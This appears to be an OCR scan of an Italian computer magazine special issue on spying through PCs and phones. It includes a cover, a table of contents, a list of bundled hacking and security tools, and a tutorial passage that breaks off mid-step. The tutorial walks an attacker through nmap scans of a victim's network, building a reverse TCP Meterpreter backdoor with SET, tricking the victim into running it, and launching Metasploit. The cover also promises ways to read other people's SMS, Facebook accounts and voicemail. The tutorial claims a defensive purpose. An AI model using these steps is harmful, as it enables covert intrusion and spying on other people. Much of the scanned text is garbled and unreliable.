

Telefonate, e-mail, Facebook... gli strumenti usati 
dagli smanettoni per curiosare nei PC di chiunque. 
Ed in più... le dritte per mettersi al riparo! 


UNA MICROSPIA 
PER IL PC 

Il tool usato dai pirati 
per scoprire i punti 
deboli dei computer 
collegati in Rete 

Provalo solo sul PC dei 

SUL CD 


SOFTWARE COMPLETO 


TI SPIU! 

GUIDE NON AUTORIZZATE! 


Così entro nel tuo 

PC&CELLULARE 


ASPIRA PASSWORD 
PER CELLULARE 


C'è chi trasforma il telefonino 
in un passepartout per scardinare 
ogni tipo di protezione 


Altro che intercettazioni! Un semplice 
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SEI SPIATO! 


IN PIÙ 


smanettone può violare la tua privacy. 

Ti facciamo vedere quanto è facile... 

' Intercettare gli SMS inviati e ricevuti dai cellulari 
✓ Spiare le foto altrui su Facebook senza essere amico 
' Entrare nel profilo Facebook e spiare il PC da remoto 
7 Ascoltare e registrare le conversazioni telefoniche 


Un semplice smanettone può 
bucare il tuo profilo. Ti facciamo 
vedere quanto è facile... 


Basta un piccolo tool per leggere 
la posta privata degli altri e spiarne 
chat e segreti. Svelati i retroscena 


ED IN PIÙ 

l'App segreta per navigare anonimi 

SEGRETERIE 
TELEFONICHE SPIATE 

C'è chi riesce ad origliare dal 
proprio telefonino i messaggi 
vocali altrui lasciati in segreteria. 
Svelati i retroscena 

IN REGALO SOLO PER TE! 


SISTEMA OPERATIVO 
AND INTERCETTAZIONI 



Ecco l'OS cloud 
di Win Magazine 
che ti regala un 
desktop e 5 GB 

di spazio Web 
sicuro 






































ASUS SERIE-S 

L'Ultrabook 


con l'ottica integrata 


Eccezionalmente sottile e leggero, il nuovo Ultrabook™ ASUS Serie S racchiude caratteristiche avanzate e complete in 
soli 21 millimetri di spessore, offrendo la velocità delle memorie SSD, la capacità di archiviazione dei dischi tradizionali, 
la praticità dell unità ottica. La sua tastiera ad isola, il touchpad con supporto alle gesture multiple e l’ampio e 
confortevole poggia polsi, consentono un utilizzo pratico ed intuitivo, mentre la tecnologia Super Hybrid Engine II 
assicura un riawio istantaneo in soli 2 secondi. Grazie alla grafica dedicata e processori Intel® di terza generazione, è 
perfetto sia per il lavoro che per l'intrattenimento. 


inside' 


L’incredibile Ultrabook IM . Ideato da Intel 


:ntd, il Logo Intel Intel Inside. Intel Cose, Ultrabook e Core Inside sono marchi registrali da Intel Corporation negli Stati Uniti e tn atl«i Paesi 
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Hacker il disco segreto.8 

Abbiamo "smanettato" con il kit che buca la rete e 
attiva un canale autorizzato sul PC del malcapitato 

SMS e App azzera credito.18 

I nuovi virus entrano nel telefonino e ti prosciugano 
la ricarica. Ecco l'app giusta per mettersi.al sicuro 

Spia senza farti spiare.20 

Trasformiamoci in agenti segreti per difenderci 
dai voyeur digitali usando le loro stesse tecniche 

Basta una tastiera per essere spiati.. 22 

Con un keylogger, chiunque può registrare quello 
che digitiamo sulla tastiera 

Alla ricerca delle cartelle condivise... 23 

Ai pirati basta poco per individuare le risorse 
pubbliche sui PC connessi a Internet 

Ti spiano anche su Facebook.24 

Uno smanettone può facilmente "bucare" il nostro 
profilo e scoprire tutto su di noi 

Cellulare: la spia che non ti aspetti... 26 

In maniera completamente "invisibile", ce chi 
controlla telefonate, SMS e i nostri spostamenti 

Google: il miglior amico delle spie ... 28 

Grazie ad alcune particolari chiavi di ricerca, è 
possibile prendere il controllo delle Webcam altrui 

Password Internet bucate.30 

Basta un semplice “programmino" per leggere 
la posta privata degli altri e spiarne chat e segreti 

Facebook sei spiato.36 

Un semplice smanettone può bucare il tuo profilo. 

Ti facciamo vedere quanto è focile 

Come ti blindo l'account Gmail.38 

Google Plus, YouTube, Android Market... basta un 
account e sei padrone del Web! Attenzione, però, 
agli accessi non autorizzati! 

Chiudi tutte le porte al tuo PC.39 

Il tool usato dai pirati per scoprire i punti deboli 
dei computer collegati in Rete 

Il Melafonino ci spia.40 

L'allarme è lanciato: funzioni nascoste e app 
di iPhone e Android rubano informazioni personali 

Navigare anonimi con il telefonino... 44 

Quando navighi dal tuo smartphone, qualcuno 
potrebbe spiarti! Ecco come difendere la tua privacy 

L'aspira password per cellulare.46 

Ce chi trasforma il proprio dispositivo in un 
passepartout per scardinare qualsiasi protezione 

Scherzi telefonici ma col trucco.48 

Ecco come prendere in giro i nostri amici inviando 
loro SMS con il mittente "camuffato" 

Così ci spiano i messaggi SMS.49 

Tecniche e strumenti usati dai pirati per leggere 
le conversazioni private effettuate con WhatsApp! 


Segreterìe, c'è chi le spia.SO 

Ce chi riesce ad origliare dal proprio telefonino 
i messaggi vocali altrui lasciati in segreteria 

Sistema operativo 

anti intercettazione.52 

Ecco l'OS doud di Win Magazine cheti regala 
un desktop e S GB di spazio Web sicuro 

Banner seccanti? No, grazie!.56 

Non ne puoi più dei fastidiosi messaggi pubblicitari 
presenti nelle app gratuite? AdFree è la soluzione! 

Metti al sicuro la tua LAN.58 

Testiamo la rete evidenziandone tutte le 
vulnerabilità, prima che siano sfruttate dai pirati. 

Si fa così 

Truffe on-line: stanne alla larga.62 

Le dritte degli esperti per acquisti sul Web a prova 
di "pacco". Perché a Natale non è vero che siamo 
tutti più buoni! 

Smartphone sotto attacco.66 

Ecco come fanno i pirati informatici a rubare i dati 
personali e i messaggi SMS inviati da un iPhone 

Account Dropbox sotto chiave.68 

Hai paura che qualcuno possa accedere ai file 
salvati nel doud? Ecco le nostre dritte per metterli 
al sicuro 

La grande Rete ci osserva.69 

Mentre navighiamo ce qualcuno che analizza 
le nostre attività sul Web. Ecco come stanarlo 
e renderlo inoffensivo 0 

Social network in cassaforte.70 

Come mettere al sicuro foto, video e dati archiviati 
nel proprio profilo Facebook 

Smartphone, protezione totale.71 

Kaspersky Mobile Security protegge il cellulare 
da furti bloccando anche chiamate indesiderate 
e app nocive 

Una giornata da hacker.72 

Con un piccolo aiuto abbiamo provato tecniche 
di attacco "proibite". Ecco i retroscena 

I tuoi documenti ostaggi dei virus.76 

Occhio a MBRLock, il trojan ransomware che blocca 

l'acceso ai dati presenti nel PC. Ecco come non 
cadere nella trappola 

File cancellati: recuperali così!.78 

. La soluzione per non doversi più preoccupare 
della perdita accidentale di file importanti 

Sapevi che.80 

• Testiamo il livello di protezione del nostro PC 
e chiudiamo le eventuali falle riscontrate 
; • Cancelliamo definitivamente file e cartelle 
dal disco rigido, impedendone il recupero 

Fermiamoli alla dogana.82 

: Impostiamo il firewall di Windows per bloccare 
; i programmi che accedono al Web senza consenso 


2013: auguri 
Speciali da 
Win Magazine* 

E siamo arrivati al rfumero 8, con altre cinque 
raccolte tematiche che la redazione di Win Ma¬ 
gazine ha sfornato per voi. Questi nuovi nume¬ 
ri seguono i cinque proposti ne! mese scorso e 
anche stavolta abbiamo tenuto conto dalle tan¬ 
tissime e-mail ricevute e dei vostri preziosi sug¬ 
gerimenti, scegliendo altri 5 argomenti di interes¬ 
se generale: Cloud PC a costo zero Software io 
non li pago più, Streaming&Download i canali 
segreti, Ti spio da PC e cellulari e Windows co¬ 
sì è perfetto 

Ben 500 pagine ricche di tutorial, trucchi e consi¬ 
gli degli esperti che sapranno soddisfare proprio 
tutti, da colui che si affaccia per la prima volta al 
mondo dell'Informatica all'appassionato di tec¬ 
nologia. Se a questo si aggiungono i supporti 
multimediali allegati, che contengono i softwa¬ 
re indispensabili per mettere in pratica i progetti 
proposti, l'offerta proposta continua ad essere 
assolutamente da non perdere. Non fermarti al¬ 
lora allo Speciale che hai in mano e ti appresti 
a sfogliare. Corri subito in edicola e completa la 
collezione dei quaderni tematici di Win Magazine! 

La redazione 


Tutti anonimi sul file sharing.84 

Scaricare dal P2P senza lasciar tracce e al riparo 
da occhi indiscreti? Con le nostre dritte si può fare! ' 

Questa e-mail si autodistruggerà — 87 

Così invii messaggi di posta che si cancellano 
da soli dopo che il destinatario effettua la lettura 

Il computer come microspia.88 

Così un semplice smanettone può trasformare 
il PC in un potente strumento da 007! 

Acquisti on-line a prova di frode.92 

Scegli la carta di credito giusta e compra sul Web 
in tutta sicurezza. Ecco le regole da seguire 

La maschera per essere anonimi.96 

Paura di essere spiati? Con le nostre dritte e il 
software giusto possiamo navigare come fantasmi 
della Rete 

I tuoi dati a prova di crash.98 

Così metti al sicuro file e cartelle importanti 
e li ripristini subito in caso di blocchi di sistema 


I prezzi di tutti i prodotti riportati all'interno della rivista potrebbero subire variazioni e sono da intendersi IVA inclusa 
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BABBO NATALE SIAMO NOI! 


wmeMule 81 

100% COMPATIBILE CON WINDOWS 8 

In esclusiva per te la versione 
adornata del Mulo con nuovi 
e inediti server sicuri 


FOM5LSERIE 


Win Magazine rende il Natale 
Scoprì come ottenere subito 
grazie a esclusivi accordi con 

6 10 software commerciali 
del valore di 500 euro 
# SIM ricaricabile per 

comunicazioni anonime 

6 Hard disk virtuale illimitato 
per scambiare file in segreto 

6 Bonus da 20 euro per le tue 

scommesse sportive on-line 


piuncco. ouw per te. 

i doni che ti abbiamo riservato 

le principali aziende hi-tech 

# Telefonate illimitate & infiniti SMS 

# Sito Internet ali-inclusive con 
dominio, e-mail e spazio Web 

# Sistema operativo on-line 
anonimo e anti-crash! 

# Fotolibro per raccogliere i tuoi 
ricordi più belli 

_ e tanto altro ancora 


NESSUN CONCORSO, REGAU GARANTITI! 


Se 


I grandi software 
ci spiano alla grande! 


H u ii ivfl i wj iMii issai CEBI 

I pirati hanno trovato il modo di sfruttare anche 
i programmi insospettabili per entrare nei nostri PC 
e prenderne il controllo! Svelati tutti i retroscena... 


•JZZXD Microsoft Antivirus 2013 « Antifurto per cellulare 


SKYGO 

SBLOCCATO iffl J, 

C'è un trucco unofficial J 

per gustarsi dì tutto ” 

anche su Netbook, 
celiulan e tablet Android 

Visioni senza scatti anche in 36! 


[ FOTOIKTOCCO • GIOCHI • VIOfOCDTOG 

I FANTASTICI 20 
DI MICROSOFT 

Software con licenza d'uso e guida 
pratica per trasformare il tuo PC 
in un vero centro di divertimento! 

FACEBOOK 
IDENTITÀ A RISCHIO 

Attenti a pubblicare sul Diario 
il numero di cellulare: qualcuno 
può usarlo per donarci l'account! 

Wikipedia 2013 

Mf?5Tì;k!Z2.4LA / •,«• ■ 

La consulti anche i 
se non sei connesso 
ad Internet 

ed in più. così la porti 
su tablet e cellulari 
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TI SPI 
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da PC e cellulare 


INCLUDE 


Backup4all Lite < 6 O 

Con questo programma ci ba¬ 
steranno pochi clic per mettere 
i nostri dati più importanti al 
riparo da possibili cancellazioni 
o errori di sistema, 
file: b4a-lite-wmniag.d|j Commerciale Completo 

Ashampoo 
Undeleter oo U 

Il programma genera un elenco 
di tutti i file cancellati che pos¬ 
sono ancora essere recuperati 
completamente o parzialmente. 
Sarà poi possibile recuperare il 
file desiderato con un solo clic. 
File: AshampooUndeleter.zip Comm. Completo 

Ucsniff3.20 

Ucniff permette di poter intercet¬ 
tare i flussi video delle webcam 
IP collegate alla rete, Wireshark 
(anch'esso nel file ZIPIconsente 
di raccogliere qualsiasi dato che 
transita sul Web. 

File: IICSNIFF4> Freeware 

Ultrasurf 1204 

Questo programma, sfruttando 
un'interfaccia principale sem¬ 
plice e molto intuitiva, permette 
di navigare su Internet in modo 
completamente sicuro e ano¬ 
nimo. 

File: llltrasurf.ap Freeware 

SoftPerfect Network 
Scanner 43 

Scanner di rete multi-thread IP, 
NetBIOS e SNMP gratuito. Può 


pingare computer, fare scan per 
porte TCP in ascolto e mostrare 
le risorse condivise di una rete. 

File: NetScannerzip Freeware 

Ultra Torrent u O 

Il programma, attraverso un pra¬ 
tico motore di ricerca, permette 
di trovare i file Torrent nei più 
ricchi database sul Web per poi 
provvedere con estrema facilità 
al download dei file veri e propri 
sul computer 

File: UltraTorrBnt.zip Freeware 

Google Hackst64 

Il software permette di indiriz¬ 
zare i risultati delle ricerche di 
Google per individuare link a 
canzoni in formato MP3 ospitate 
su server privati 0 indirizzi per 
accedere a proxy che consen¬ 
tono di navigare in completo 
anonimato. 

File: GoogleHackzip Freeware 

OrbotToron Android 

Come difendere il nostro ano¬ 
nimato direttamente dal nostro 
smartphone 0 tablet Android? A 
rispondere alle nostre esigenze 
ci pensa Orbot, l'app rigorosa¬ 
mente gratuita che si appoggia 
alla rete Tor. 

File: www.winmagaane.it/lirrk/t 555 Freeware 

Qube-OS O 

Un vero e proprio sistema ope¬ 
rativo con tanto di applicazioni, 
Web Store, chat e uno spazio 


di ben 3 GB su cui salvare ogni 
genere di file. 

File: www.qube-os.coni Freeware 

Nmap 6.01 

Uno scanner di rete che ana¬ 
lizza lo stato delle porte su un 
computer bersaglio o un gruppo 
di ifidirizzi IP e permette di indi¬ 
viduare dispositivi e servizi attivi 
all'interno di una rete. 

File: NMARzip Freeware 

Cyberduck 421 

Completo dient FTP che, tramite 
un'interfaccia molto semplice e 
intuitiva, permette a chiunque 
di utilizzare subito il software, 
senza nessuna difficoltà. 

File: Cyberduckiip Freeware 

Dropbox 1417 

Il programma mette a disposi¬ 
zione degli utenti uno spazio 
Web per poter archiviare e con¬ 
dividere qualsiasi documento. 

File: OroptKixzip Freeware 

Mothen .02 

Questo gioco è un simulatore di 
Hacking ambientato nel futuro, 
dove grandi corporazioni mon¬ 
diali impongono la propria su¬ 
premazia attraverso il Network, 
una grande rete informatica. 

File: Mottier.zip Freeware 

Il virus del mese O 

In questo archivio abbiamo rac¬ 
colto tutti gli articoli della rubrica 


PRODOTTI COMPLETI 



AVAST! FREE j 1 1 

Addio per sempre ai problemi di sicurezza 
per il tuo computer 

Nella versione 7 Avast si presenta con novità e mi¬ 
gliorie, a cominciare dalla funzione di virtualizzazio- 
ne AutoSandbox, un ambiente virtuale e sicuro in cui 
l'eventuale esecuzione di un programma sospetto 
non avrà ricadute sul sistema operativo vero e pro¬ 
prio. Nella SandBox è presente anche il tool "Browser 
Sandboxing", che permette di isolare il browser dal 
resto del sistema. 

S.O.: Windows XP/Vista/7 ■ Dimensione: 71.958 KB ■ File: Avast7.zip 


TRUECRYPT z ia a 

Disi conservi i tuoi File e documenti privati 
in una cassaforte digitale 

Il software permette di crittografare un hard disk tra¬ 
sformandolo in un disco virtuale, accessibile solo agli 
utenti autorizzati. Consente anche di cifrare un'intera 
partizione e di effettuare l’autenticazione prima che 
venga caricato Windows. Tra le novità troviamo il 
supporto dell'accelerazione hardware e la possibilità 
di attivare automaticamente un volume virtuale cifra¬ 
to ogni volta che il dispositivo viene collegato ai PC. 

S.O.: Windows XP/Vista/7 ■ Dim.: 2.648 KB ■ File: truecryptzip 

























Il software sul CD-Rom @ 


fissa ”11 virus del mese" in 
formato PDF, a partire dal 
numero 77 di Win Magatine. 

File: PDFvirusiip Freeware 

Secure Eraser Standard 
Edition 4007 

Anche svuotando il cestino, 
con appositi tool è possibile 
recuperare i file cancellati 
dal disco rigido. Per eliminarli 
definitivamente e impedire 
ai ficcanasi di sbirciare nei 
fatti nostri, ci serve sicura¬ 
mente Secure Eraser. 

File: SecureFraserzip Freeware 

Security Analyzer 0.30.1 

Security Analyzer ci aiuta a 
sbarrare le porte di Windows 
7 indicando cosa manca e 
quali impostazioni correg¬ 
gere. 

File: SeoirityAnalyzerzip Freeware 

StealthNet 0.879 U 

Tra i migjiori tool di P2P 
anonimo utilizzabili c'è Ste¬ 
althNet, un software che si 
appoggia ad una nuova rete 
di nome RShare. 

File: steatttmetzip Freeware 

VLC Media Player 03 O 

Questo programma, grazie 
al supporto ad uno svariato 
numero di codec multime¬ 
diali, è uno dei più apprezza¬ 
ti player in circolazione. 

File: VICip Freeware 


WirelessKeyView lì6 

Questo software fa una cosa 
sola, ma incredibilmente be¬ 
ne: recupera le "chiavi” delle 
connessioni wireless, posto 
che queste siano memoriz¬ 
zate nel computer, 

File: WirelessKeyiip Freeware 

RoboForm2Go 7870 

Ecco un programma utile per 
chi è sempre in giro e ha la 
necessità di avere a portata 
di mano i dati di accesso ai 
vari siti Web.- 

FSe: RotoFwm2Go jp Freeware 

HttpWatch Basic 
Edition 8318 

Questo plug-in, compatibile 
con Internet Explorer e Fire- 
fox, permette di visualizzare, 
monitorare e analizzare il 
traffico di Rete integrandosi 
perfettamente nel browser. 

File: fittpwatdiap Freeware 

Win eMule 20 B O 

Versione personalizzata del 
più utilizzato programma di 
file sharing al mondo che la 
Redazione di Win Maghine 
regala ai suoi lettori. 

File: Win-eMrfaip Freeware 

Simple Port 
ForwardinguoKJ 

Questo software consente di 
aprire direttamente le porte 
senza mettere mano alle 


configurazioni del router, 
in maniera assolutamente 
elementare. 

File: SimplePortFW.zip Freeware 

iMule 1.45 O 

Client peer-to-peer innovati¬ 
vo, basalo sulla rete protetta 
e cifrata I2P, che permette la 
condivisione in Rete dei file 
mantenendo l'anonimato. 

File: IM 11 le.zip Freeware 

Malwarebytes 
Anti-Malware t6sU 

Il software consente di sco¬ 
vare e rimuovere dal sistema 
tutti quei software dannosi 
(Worm, Rogue, Backdoor, 
Rootkit, ecc.) che cercano di 
causare danni al computer. 

File; Anti-Malware.zip Freeware 

TVosa 37 □ 

Il programma permette di 
visualizzare le trasmissioni 
televisive in streaming sul 
proprio computer e regi¬ 
strarle in formato AVI e ASF 
in una qualsiasi cartella del 
disco rigido. 

File: TVOSA.zlp Freeware 

Scova Scareware IJ 

Un programma che analizza 
a fondo il disco fisso e con¬ 
sente in pochi clic di rilevare 
la presenza di scareware nel 
computer. 

File: ScovaScarewerezip Freeware 


Infra Recorder 1520 

Le principali caratteristiche 
di questo software sono: 
creazione di progetti e ma¬ 
sterizzazione di file audio e 
dati, creazione di supporti 
ibridi, cancellazione dei di¬ 
schi riscrivibili. 

Rie: lnfraReconler.zip Freeware 

Spyware 

Terminator 2017 U 

Nuovo software adatto a 
bloccare virus, spyware, 
trojan, hijack e keylogger. 
L'interfaccia è suddivisa in 
più sezioni, ciascuna con 
tanti sottomenu per ulteriori 
personalizzazioni. 

File: SpyTerminalorzip Freeware 

Clam Antivirus 0975 

Nato come prodotto open 
source per sistemi Linux, 
Clamwin ha integrato in 
seguito un'interfaccia grafica 
e adesso è perfettamente 
compatibile con tutti i sistemi 
operativi Microsoft 

File: ClamlAfm.zip Freeware 

NVU i o 

Uno dei più potenti, efficaci 
e versatili Web editor in 
circolazione. Basato su piat¬ 
taforma Mozilla e sul motore 
grafico Gecko, NVU consente 
di modificare e creare pagine 
Web. 

File: NVU,zip Freeware 


Mail PassView iti O 

Questo strumento consente 
dì recuperare le password 
dimenticate o perdute degli 
account di posta. 

Rie: (Mtaiewzip Freeware 

Asterisk Key 10.0 

Per recuperare le nostre 
password perdute possiamo 
utilizzare questo software, in 
grado di svelare con efficacia 
il contenuto nascosto. 

File: asteriskeyiip Freeware 

RemoteTracker 0.43 O 

Con questo tool possiamo 
rintracciare il palmare smar¬ 
rito attraverso un SMS. Il pro¬ 
gramma rileva la posizione 
del PDA utilizzando il GPS in¬ 
tegrato e invia le coordinate 
con un SMS di risposta. 

File: RemoteTrackerzip Freeware 

HTTrack 43-9 0 

Il programma consente di 
scaricare interi siti Web diret¬ 
tamente sul disco rigido del 
computer, preservandone 
l'intera struttura. 

File: HTfrackzip Freeware 

Guardian Free Edition O 

Questo programma può 
essere usato per sapere 
dove si trova il cellulare e 
per recuperare l'elenco delle 
chiamate effettuate. 

File: guardianzip Freeware 



TOR BROWSER 2.3 fi 

Per navigare su Internet senza lasciare tracce, 
ti bastano una chiavetta e il nostro tool! 

Come ben sappiamo, quando navighiamo siamo 
identificati nel grande mare di Internet mediante 
un indirizzo IP univoco. La soluzione per cambiare 
questo indirizzo IP, per far perdere le nostre tracce 
in giro per il mondo, c'è e si chiama Tor Browser. 
Questo software permette in pochi clic di navigare in 
maniera totalmente anonima perché non solo è in 
grado di nascondere il nostro indirizzo IP, ma anche 
di mascherare il traffico Internet generato dal brow¬ 
ser stesso! 


S.O.: Windows XP/Vista/7 ■ Dim.: 21.286 KB ■ File: TorBrowserzip 


GHOSTERY 

Lo strumento che analizza il computer per 
scoprire chi controlla le tue attività sul Web 

Questo plug-in, una volta installato nel browser, 
permette di scoprire se qualcuno sta analizzando il 
proprio traffico Web. Una volta individuato qualche 
"curioso", è possibile bloccarne le funzioni di traccia¬ 
mento per rendere la navigazione personale assolu¬ 
tamente invisibile ai suoi occhi indiscreti. Nell'archivio 
ZIP abbiamo incluso le versioni per Firefox, Safari e 
Opera, mentre qui si può scaricare il plug-in per Chro- 
me e a quest'altro link quello per Internet Explorer. 


S.O.: Windows XP/Vista/7 ■ Dimensione: 921 KB ■ File: Ghosteryap 



| Display Opttons 


Show Afri BuMUt ■" *ie m •* » - coni*. OfMiNM BtfiNB «ftw n seconcfc 

: 3 Show bug «crtpt inumi (m ih» browser popupf 
» Show &ho*tefy in Add on 8» 

1 Show Gho<U»ry button m Navigatori Bai 



BACKTRACK LINUX s 

Il tool esclusivo per entrare facilmente 
in qualsiasi computer 


Questa distribuzione Linux viene utilizzata principal¬ 
mente dai tecnici per verificare il livello di sicurezza 
dei computer. La versione 5 (nome in codice Revolu¬ 
tion) include più di 348 tool di sicurezza e si focalizza 
principalmente sulla maggiore compatibilità/flessibi- 
lità dell'hardware. L'immagine della distribuzione (in 
formato ISO) deve essere masterizzata su DVD: basta 
inserire un disco vuoto nel masterizzatore, avviare il 
software ImgBurn e lanciare la scrittura del file. 

S.O.: Linux ■ Dim.: 1 GB ■ File: www.winmagazine.it/link/1758 
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Cosa ci f J 
occorre 

TOOL Di HACKING 

BACKTRACK 

LINUX 

Sito Internet: www. 
backtrack-linux.org 

Note: 

I lettori dello Speciale 
di Win Magatine 
potranno scaricareja 
ISO della distribuitone 
Backtrack Linux dal link 
www.winmagatine. 
it/link/1758 


I l rischio più probabile a cui andiamo in¬ 
contro ogni volta che usiamo un PC è che 
i nostri dati vaghino in giro per la Rete, 
finendo nelle mani sbagliate. A quel punto, 
chiunque abbia un minimo di conoscenze 
tecniche e sia a conoscenza del nostro indi¬ 
rizzo IP, riuscirà ad analizzare l'intero traffico 
di rete, inclusi i siti Web che raggiungiamo 
o le password che digitiamo. Per farlo, può 
intraprendere differenti strade ma senza 
ombra di dubbio la più conosciuta, rapida e 
funzionale è quella di sfruttare le vulnerabi¬ 
lità del sistema operativo che utilizziamo. 

Sistemi operativi a rischio 

Inutile precisare che il pirata preferisce avere 
a che fare con gli utenti Windows che, fra gli 
OS piti conosciuti, è di sicuro quello più a 
rischio e sul quale è più semplice installare 
una backdoor per farsi poi spazio nell'hard 
disk. Ma non dobbiamo d imenticare che Mae 
OS X o lo stesso Linux non sono esenti da tale 
problematica: ogni sistema operativo ha, 
infatti, il suo tallone d’Achille e l’unica arma 
che abbiamo a disposizione per difenderci è 
quella di conoscere tutte le vulnerabilità del 
sistema che utilizziamo. E poi c’è Facebook, 
il luogo preferito non solo da milioni di utenti 
sparsi per il mondo ma anche dai pirati asse¬ 
tati di dati altrui. Riuscire a creare un clone 
perfetto dell'home page del social network in 
blu è veramente un gioco da ragazzi e ai pi rati 
basta poco per dirottarci su queste pagine 
fasulle dove, ignari del pericolo incombente, 
andremo ad effettuare il login usando user- 
name e password del nostro account! Come 
difendersi? Imparando ad usare le stesse armi 
d'attacco dei pirati! Immergiamoci, dunque, 
in questa nuova avventura, analizzando ogni 
singolo caso e ogni possibile minaccia: solo 
così riusciremo a creare un’invalicabile linea 
di difesa. 


Hacker 
segreto 

Abbiamo “smanettato” con il kit 
che buca la rete e attiva un canale 
autorizzato sul PC del malcapitato 












Hacker il disco segreto | 


Ti spio daPCf^ 


□ Grimaldello da taschino 


Lo strumento preferito dai pirati per intrufolarsi nei computer altrui è la distribuzione BackTrack Linux: semplice 
da usare e ricca di tool adatti allo scopo, può essere installata anche su chiavetta USB. 



[WIODAUTÀ LIVE 


.ii i Trai > Sten 1 1 ii - No 
BartiTrack Fimtnsir.s - I 
Bank Tracfc i.ullBM - Ho Ili 
Har:k7rai:k Deliuy 
IMckTrvtck nra !«1 - Hm 
!lur:l CrluL- Ror.l bopt 


hpck I trark 


aì Tutto su un DVD 

■J I Scarichiamo dal link www. BT5R1-GN0- 
\mm£ ME-32.iso con l'immagine della distribu¬ 
zione da masterizzare. Inseriamo un DVD vuoto nel 
masterizzatore, avviamo Nero Burning Rom e cuc¬ 
chiamo su Masterizzatore/Scrivi immagine. 


^ Dentro al BIOS 

2 I Terminata la masterizzazione, riawiamo il 
kmvJ PC. Accediamo al BIOS premendo Cane e 
impostiamo il boot da periferica DVD. L’operazio¬ 
ne varia in base al tipo di scheda madre installata 
nel computer. Inseriamo quindi nel lettore il disco 
di BackTrack e riawiamo nuovamente il PC, 


^ Avviamo la distro 

0 I Verrà caricata la distribuzione. Nella scher 
mata di boot che appare selezioniamo Bac¬ 
kTrack Text e confermiamo con Invio. Digitiamo 
il comando startx. premiamo Invio e attendiamo 
il caricamento dell’interfaccia grafica. La distro è 
pronta per essere usata in modalità Live DVD. 




^ Usiamola da chiavetta 

•| | Colleghiamo una pendrive con almeno 4 GB 
di spazio libero ad un ingresso USB disponi 
bile sul computer e cucchiamo sul pulsante Instali 
BackTrack 5 RI presente sulla Scrivania. Selezio¬ 
niamo quindi la lingua Italiano e avviamo la proce¬ 
dura guidata con un clic sul pulsante Avanti. 


* Partizioni da smontare 

2 | Proseguiamo fino a raggiungere la sche- 
da Disposizione della tastiera. Scegliamo 
l'opzione Italia e rispondiamo cuccando su Sì alla 
domanda Smontare le partizioni in uso. Così facen¬ 
do potremo installare BackTrack 5 RI anche sulla 
pendrive USB collegata precedentemente al PC. 


a. La pendrive è pronta! 

3 :) Clicchiamo su Avanti fino a raggiungere la 
scheda Preparazione spazio su disco. Sce¬ 
gliamo l’opzione Cancella e usa l’intero disco trp 
quelle proposte. Dal menu a tendina selezioniamo 
la periferica USB (indicata con sdb) e confermiamo 
premendo ancora una volta il pulsante Avanti. 



^ Rendiamola avviabile 

Prima di procedere all'Installazione definitiva della distro, clicchiamo 
sul pulsante Avanzato. Abilitiamo l'opzione Installare il boot loadere 
selezioniamo dal menu a tendina la pendrive USB (nel nostro caso, clicchia¬ 
mo /dev/sdb). Confermiamo con un clic sul pulsante OK. 


a. | installazione in corso 

g f Non rimane che cliccare sul pulsante Installa e attendere che l’instal- 
w? lazione venga correttamente portata a buon fine. Completata la pro¬ 
cedura guidata, potremo riawiare il computer ed effettuare il boot dalla peri¬ 
ferica USB, impostando la voce corretta nel BIOS (Passo 2). ► 
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C Ti spio da PC 
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a Accesso non autorizzato 

Grazie al programma Nmap, il pirata rileva l'indirizzo IP e il sistema operativo della vittima. In questo modo potrà 
identificare facilmente i punti deboli del computer attaccato per usarli a proprio vantaggio. 



^ Scansione in corso 

■j | Ottenuto l’accesso alla LAN cui è collega- 
ta la vittima, il pirata avvia il Terminale e 
digita il comando nmap -sP - PT80 seguito dal 
range di indirizzi IP da scansionare (nel caso in 
esempio, da 192.168.114.1 a 192.168.114. IO). 
Conferma con Invio e attende il risultato. 


\ 


« ■* rocrtiwtTjol - 



■ n.mm 


a Porte aperte sul PC 

2 | Osservando l'output ottenuto, decide di 
w analizzare ogni singolo IP rilevato. Digita 
il comando nmap -sS seguito dall'indirizzo della 
vittima (nell'esempio, 192.168.114.1) e attende 
che l'elenco delle eventuali porte aperte sul PC 
della vittima venga mostrato su schermo. 



a OS rilevato! 

\ J 1 II pirata continua la sua fase di analisi cer- 
cando di scoprire quale tipo di sistema 
operativo è utilizzato sul computer della vittima. 
Digita quindi il comando nmap -0 seguito dall'in¬ 
dirizzo IP (nel caso in esempio, 192.168.114.1) e 
attende che venga visualizzato il verdetto. 



Rete bucata in tre mosse 


Le falle di sicurezza degli OS più diffusi consentono al pirata di intrufolarsi agevolmente nel nostro PC. Per farlo, 
deve prima creare un “payload”, cioè un programma per l’accesso da remoto. Ecco in che modo. 



* Tutto da iinea di comando 

j ! Avviata una nuova sessione del Terminale, 
•mmJ il pirata accede con cd alla directory pen- 
test/exploits/sete impartisce il comando ./set per 
avviare il software Set. Sceglie l'opzione 4 per cre¬ 
are un payload e un listener (una lista di operazioni 
da eseguire) da iniettare nel PC della vittima. 


▲ Obiettivo: Windows 

2 1 Supponendo che il pirata voglia colpire un 
w PC con sistema operativo Windows (quello 
rilevato in precedenza da Nmap), il pirata digita 2 
e conferma con Invio per scegliere l’opzione Win¬ 
dows Reverse__ TCP Meterpreter (mediante il qua¬ 
le controllerà il PC vittima da Terminale). 


a i Una porta d'ingresso 

3 f A questo punto, il pirata crea un file esegui- 
bile capace di sfruttare una backdoor attiva 
sul PC bersaglio. Digita quindi 16 e conferma con 
Invio. Indica una porta di ascolto (nel nostro caso 
abbiamo scelto la 4444) e preme nuovamente 
Invio. Attende dunque che Wexe venga generato. 
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Ti spio daPCC^ 



Creata la backdoor, il pirata sfrutta alcune tecniche di ingegneria sociale per installarla sul PC 
della vittima. Per riuscire a prendere il controllo del sistema da remoto, usa il tool Metasploit. 



icidicrf* Plmes Sy-EMW FJ 


Sai Oct 22. 2 50 PM 


rootijroot: ropt,tramework/ni5f3 

> fctht vie* «ciò 

tersoli-* cd /’opi/frwKvuik/ 1 

:/opt/fr «fieno rk< 1’. 

confij tih pmtgre»qi run,ih 

icont licenws uropcrnes^int sbin svn 

non jbwb trtfj ruby 

t«r«ioi ./opt/frotwwcrkP cd n»f3/ 
tfjroot:/opt/fr»«*»»rk/«»*f3* /tu f tomoli* | 




f 




H 3; 


^ Il file fondamentale 

Usando il file manager di BackTrack, il pirata raggiunge 
la directory set in pentest/exploits con il comando cd. 
Copia quindi il file msf.exe creato in precedenza (Passo C3) e, 
tramite pratiche di social engineering, lo trasferisce sul PC della 
vittima, avviandolo. 


dJ 


y 


Metasploit in azione 


A questo punto, il pirata avvia una sessione del Termina¬ 
le e con il comando cd raggiunge il percorso /opt/frame 
work/msf3. Digita il comando ,/msfconsole per avviare il sof¬ 
